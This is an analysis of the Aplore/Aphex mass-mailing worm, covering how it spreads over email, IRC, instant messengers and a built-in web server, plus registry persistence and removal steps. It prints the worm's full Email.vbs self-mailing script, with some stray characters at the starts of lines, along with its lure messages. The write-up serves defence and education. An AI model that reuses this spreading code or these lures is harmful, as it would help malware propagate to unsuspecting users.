32/Aplore-A

Also Known As: W32.Aphex@mm, Bloodhound.VBS.Worm, I-Worm.Aphex,
W32/Aplore-A, W32/Aplore@MM, Win32.Aphex, WORM_APLORE.A, Aphex,
I-Worm.Aphex, Psec, Win32/Aphex.Worm, W32.Aphex@mm

Infection Length: 319,488 bytes (varies)

Article by Golcor

Description
Aplore is a mixture of tried and tested exploits in which all the code used
was previously available. It was simply cobbled together into a Delphi file
and distributed in various ways:

Outlook Express email
mIRC IRC program
XiRC Component for Delphi
AOL instant Messenger (AIM)
MSN
A web server it also drops
It is a mass mailing worm that spreads itself by creating it’s own http
webserver on Port 8180 and advertises itself to IRC (Internet Relay Chat)
users and to AIM (AOL Instant Messenger) users in an attempt to entice them
into running the worm. When run, it creates a VBScript file in the Windows
System Directory, %SysDir%\Email.vbs, that sends itself to all users in the
Windows Address Book and closes the Outlook application, and then deletes
the Email.vbs script.

It copies itself into the %System% folder usually as
psecure20x-cgi-install6.01.bin.hx.com and explorer.exe. To ensure it starts
everytime windows is booted it adds the registry value

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Explorer =
“%SYSTEM%\[filename]” or
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ResourceMonitor
= “%SYSTEM%\[filename]”
The web server http service which it spawns on port 8180 uses an index.html
file that the main worm drops and is used as a default web page. Anyone
recieving a message from an infected user is pointed to that page risking
infection for their machine if they download and run the infected file.

If mIRC is installed on the infected machine on drives c: d: or e: in either
the Program Files or mirc folder, it drops a script and overwrites the
mirc.ini file. An attempt is made to spread with this script when mIRC is
next opened.

Technical Details
There are many variants of this worm. This description attempts to address
them all in one document.

The main component is written in Delphi and contains IRC spreading routines
and an embedded web server. When connected to IRC or AIM, it sends a Web
link to IRC channels or AIM contacts that points to the index.html file that
was dropped on the infected computer. This Web page asks the visitor to run
a copy of the worm.

If a user connects to the server then it sends the previously dropped
index.html. The initial component can have any name. Once it is executed it
drops three files:

One of: Syslog.js, Setup.js or Sex.js
Clean.vbs
Default.ini
Email
When the attached file is executed the worm drops the file email.vbs. This
Visual Basic script then attempts to send an email to every person in the
Outlook Express address book. It includes an attachement called
Psecure20x-cgi-install.version.6.01.bin.hx.com. The Subject and Body of the
email are a simple period(.) and the From field contains the name of the
infected computer. Once Outlook is closed by the worm, the script email.vbs
is deleted. It arrives attached to an email message which contains the
following information,

Subject: .
Body: .
Attachment: psecure20x-cgi-install.version6.01.bin.hx.com

NB : The Subject and Body fields contain only a “.” (dot, period)

Email.vbs which the Worm creates, runs and deletes contains the following
code.

On Error Resume Next
/Dim oFileSystemObject, sScript, sSystem, iIndex
BSet oFileSystemObject = CreateObject(“Scripting.FileSystemObject”)
sScript = WScript.ScriptFullName
/sSystem = oFileSystemObject.GetSpecialFolder(1)
2Set oOutLook = CreateObject(“Outlook.Application”)
TFor iIndex = 1 To
oOutLook.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries.Count
“Set mMail = oOutLook.CreateItem(0)
OmMail.To =
oOutLook.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(iIndex)
mMail.Subject = “.”
mMail.Body = “.”
QmMail.Attachments.Add(sSystem &
“\psecure20x-cgi-install.version6.01.bin.hx.com”)
mMail.Send
Next
OutLook.Quit
FileSystemObject.DeleteFile(sScript)

When the program is executed it copies itself to the Windows System
directory as EXPLORER.EXE, creates a file called IPHIST.DAT in the directory
the original file was run from before copying and adds a registry entry.
IPHIST.DAT is an empty file of 0 bytes and is completely harmless.

AIM & MSN Messenger

Additional research shows that MSN Messenger users are also vulnerable to
infection and the spreading of this worm. The worm hooks AIM and MSN
Messenger child windows by looking for the titlebar text. Once one of these
messenger windows is detected it replaces the text in the window with the
following text.

YourScreenName: btw, download this, (Your IP Address):8180

ie InfectedGuy: btw, download this, http://freeporn@127.0.0.1:8180

Other examples of the text used in spam messages sent from infected
computers via AIM and MSN

I wanted to show you this,
please check this out,
hey go to,
download this,
see if you can get this to work,
this is cool,
tell me what you think about,
try this,
I almost forgot about,
I like this,
what about,
have you seen,
interesting,
lol,
wow,
whoa,
neat,
hmm,
psst,
hehe,
haha,
silly,
weird,
cool,

NB : In a web address, text preceeding @ is not taken as part of the
address, but taken as login password etc. Trying
http://trythis@microsoft.com/ would take you to microsoft.com and the
trythis@ would be completely ignored as part of the actual address.

IRC

If you use IRC you are likely to receive messages like the ones below if on
any of the IRC.DAL.NET IRC servers.

Messages will be received from any of the nicknames below and each will have
a randomly generated 3 digit number appended to the end of the nickname. ie
aaren203

1) The IRC part of the Worm exploits the legitimate XiRC Component for
Delphi, written by Martin Bleakley which is not dependent on mIRC in any
way. It tries to connect to a server with a random nickname chosen from a
list of female names stored in the worm code. It tries to join random
channels and message people to visit the web page it created on the infected
machine. The message contains the text “FREE PORN:” and the IP address of
the infected computer.

2) Using one of the *.js files, Aplore drops c:\default.ini, which contains
a mIRC script. This script contains errors which prevent it from executing
all the code properly. The *.js file modifies all the the mirc.ini files it
can find, then deletes c:\default.ini. When mIRC is next started it tries to
send messages out that point to the index.html file on the infected computer

Webserver

When the server is started, it listens for connections on port 8180. The
page on the URL says that the user has to download a plugin to view the
content. Some variants have a REFRESH tag so in one second it offers the
worm file for download. When the user chooses to run the file it starts and
infects the new system.

Solution

Do NOT reboot your machine.

If you have mIRC installed, ensure it is closed. Delete the mirc.ini file as
it was over written by the virus code. mIRC will rewrite this file properly
when you next start it up.

Delete the registry key it created.

Scan your computer with SwatIt trojan scanner or Trend’s Housecall Online
scanner. Delete any file identified as Aphex or Aplore.

Restart your computer.